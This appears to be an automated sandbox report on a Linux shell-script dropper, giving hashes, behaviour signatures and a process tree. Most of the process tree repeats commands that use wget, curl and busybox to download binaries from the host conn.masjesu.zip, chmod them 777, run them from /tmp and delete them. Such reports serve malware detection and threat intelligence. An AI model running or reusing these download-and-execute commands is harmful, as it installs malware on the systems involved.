Analysis
-
max time kernel
148s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
25/10/2024, 01:10
Static task
static1
Behavioral task
behavioral1
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
-
Size
10KB
-
MD5
ae125d61416f00e8ab77c13b1c87f06f
-
SHA1
a50cea28aa988684f1d031bd2504e6306371bd65
-
SHA256
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a
-
SHA512
762c6ad0536b762a73b4963dd635b801bada9f095ac7fbcb3ff72a12c880666640bab1383c1ad21571f47c02ddf9e0a832963df51ed819276b7dd8269e26830e
-
SSDEEP
192:Nr345Rs+M0oTailh1+HPCegD5BMzv2h1+HPd0oTaiB5BMzvar345Rx:Nr345Rs+M0oTaiJegD5BMzvR0oTaiB5e
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 20 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 61 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- System Network Configuration Discovery
PID:734
-
-
/bin/chmodchmod 777 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf./V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵PID:740
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n./4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵PID:756
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- System Network Configuration Discovery
PID:758
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- System Network Configuration Discovery
PID:774
-
-
/bin/chmodchmod 777 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR./JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵PID:782
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- System Network Configuration Discovery
PID:783
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- System Network Configuration Discovery
PID:802
-
-
/bin/chmodchmod 777 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ./r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵PID:809
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:810
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:814
-
-
/bin/chmodchmod 777 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya./KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵PID:826
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:844
-
-
/bin/chmodchmod 777 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7./QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr./J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO./gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:872
-
-
/bin/chmodchmod 777 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74./0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y./2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr./PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g./ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR./Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv./EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO./gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya./KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7./QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr./J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv./EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74./0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- System Network Configuration Discovery
PID:953
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97